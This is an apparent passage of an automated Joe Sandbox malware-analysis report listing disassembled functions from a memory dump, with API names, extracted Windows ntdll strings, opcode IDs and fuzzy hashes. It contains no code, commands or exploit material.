                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: Initializing the shim DLL "%wZ" failed with status 0x%08lx$LdrpLoadShimEngine$Loading the shim DLL "%wZ" failed with status 0x%08lx$minkernel\ntdll\ldrinit.c
                                                                        • API String ID: 3446177414-3589223738
                                                                        • Opcode ID: d365ea16fc101d859487da7b554b27cff087e648c4132e3e31f80ccd7c8a2e05
                                                                        • Instruction ID: 23466e3e4aaca5035462685aa611f8971b78970e3b5994cd3549d613da3acf4a
                                                                        • Opcode Fuzzy Hash: d365ea16fc101d859487da7b554b27cff087e648c4132e3e31f80ccd7c8a2e05
                                                                        • Instruction Fuzzy Hash: F1514372A142589FCB04DBECCC95F9D7FB2BB64708F008129E544AB2A5DB7CAD44DB90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2050F157 Relevance: 10.6, APIs: 2, Strings: 4, Instructions: 128timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        • Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information, xrefs: 2050F263
                                                                        • Entry Heap Size , xrefs: 2050F26D
                                                                        • ---------------------------------------, xrefs: 2050F279
                                                                        • HEAP: , xrefs: 2050F15D
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: ---------------------------------------$Below is a list of potentially leaked heap entries use !heap -i Entry -h Heap for more information$Entry Heap Size $HEAP:
                                                                        • API String ID: 3446177414-1102453626
                                                                        • Opcode ID: 654d699d6877fb674dacd14a0b40df8dc52f93f5c245c31149424b11956be0f3
                                                                        • Instruction ID: e66cf6106b33c44b117729515e840b2294726a0e286d3e9c386a5961ecdfd13e
                                                                        • Opcode Fuzzy Hash: 654d699d6877fb674dacd14a0b40df8dc52f93f5c245c31149424b11956be0f3
                                                                        • Instruction Fuzzy Hash: 40417A39A14616DFC704CFA8C884A09BFF6EF9D358725C16AD408AB621D735ED42DF90
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20469126 Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 199timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID: $$@
                                                                        • API String ID: 3446177414-1194432280
                                                                        • Opcode ID: 7327d471bd5b7a9ff266f362f4be85fad9d538a2c5ca2050ae358d9bab3109cf
                                                                        • Instruction ID: c118cb16050f6b97d2691d5f55b1278607368be260a86409fa28371d9370bf0f
                                                                        • Opcode Fuzzy Hash: 7327d471bd5b7a9ff266f362f4be85fad9d538a2c5ca2050ae358d9bab3109cf
                                                                        • Instruction Fuzzy Hash: 77817275D002699BDB25CF94CD45BDEB7B8AF08744F0081DAEA19B7240E7789E84CF60
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 205120E0 Relevance: 8.8, APIs: 2, Strings: 3, Instructions: 84COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$[$]:%u
                                                                        • API String ID: 48624451-2819853543
                                                                        • Opcode ID: 0764d9cd29f262a581f0beeef91862a226e0d4f70531fb459b3dd3d44199da72
                                                                        • Instruction ID: c2aafec3af3c393779e2a52a36e20a0eae4232b9b0a64ffc8ae2ce962563f12f
                                                                        • Opcode Fuzzy Hash: 0764d9cd29f262a581f0beeef91862a226e0d4f70531fb459b3dd3d44199da72
                                                                        • Instruction Fuzzy Hash: 8F2192B6E00119ABDB00DFF9CC40AEEBBF8EF58644F44411AE904E3200E734DA51CBA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 20512300 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 90COMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Strings
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: ___swprintf_l
                                                                        • String ID: %%%u$]:%u
                                                                        • API String ID: 48624451-3050659472
                                                                        • Opcode ID: dc24a9fd847ea73ee3b446913206f66de249a204c685ffae3fcb51b1eb667c13
                                                                        • Instruction ID: 2f54f6ffcbcd966e1421363bfc30ef1578988e5143f6251f963f1a4f29e35407
                                                                        • Opcode Fuzzy Hash: dc24a9fd847ea73ee3b446913206f66de249a204c685ffae3fcb51b1eb667c13
                                                                        • Instruction Fuzzy Hash: 2E316672A00519AFDB10CF69CC41BEEBBF8FB54614F404959E959E3240EB34EE958FA0
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 2053A4CA Relevance: 6.2, APIs: 4, Instructions: 170timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: 1ac40b8bd5775d796214b3689517f1f142910927d98f847b413d0bdb1202f367
                                                                        • Instruction ID: d1f948161f5ebbdadc3823a54ceb53266d95d83cc9141ce65960e893009ff8a5
                                                                        • Opcode Fuzzy Hash: 1ac40b8bd5775d796214b3689517f1f142910927d98f847b413d0bdb1202f367
                                                                        • Instruction Fuzzy Hash: A4514C35704A129FDF08CF98C9A5A197BF1FB89210F24456DEA06CB761DB78ED41DB80
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%

                                                                        Function 204DF1D6 Relevance: 6.2, APIs: 4, Instructions: 150timeCOMMON
                                                                        Download Yara Rule
                                                                        APIs
                                                                        Memory Dump Source
                                                                        • Source File: 00000008.00000002.2184375550.0000000020430000.00000040.00001000.00020000.00000000.sdmp, Offset: 20430000, based on PE: true
                                                                        • Associated: 00000008.00000002.2184375550.0000000020559000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.000000002055D000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        • Associated: 00000008.00000002.2184375550.00000000205CE000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                        Joe Sandbox IDA Plugin
                                                                        • Snapshot File: hcaresult_8_2_20430000_Overfondle.jbxd
                                                                        Similarity
                                                                        • API ID: DebugPrintTimes
                                                                        • String ID:
                                                                        • API String ID: 3446177414-0
                                                                        • Opcode ID: 18f9a5f33a2e8f717475ae21b31c0e72dc2e4f4244fd9528d572a720ca379c3c
                                                                        • Instruction ID: 6856f51bc2f4f1b63d333d42a1606b61ac274c4468c82417064cc05eb56e0357
                                                                        • Opcode Fuzzy Hash: 18f9a5f33a2e8f717475ae21b31c0e72dc2e4f4244fd9528d572a720ca379c3c
                                                                        • Instruction Fuzzy Hash: C15132B2E002299FDF18CFD8C855ACCBBB1BF48354F15826AE905AB350D339A901CF54
                                                                        Uniqueness

                                                                        Uniqueness Score: -1.00%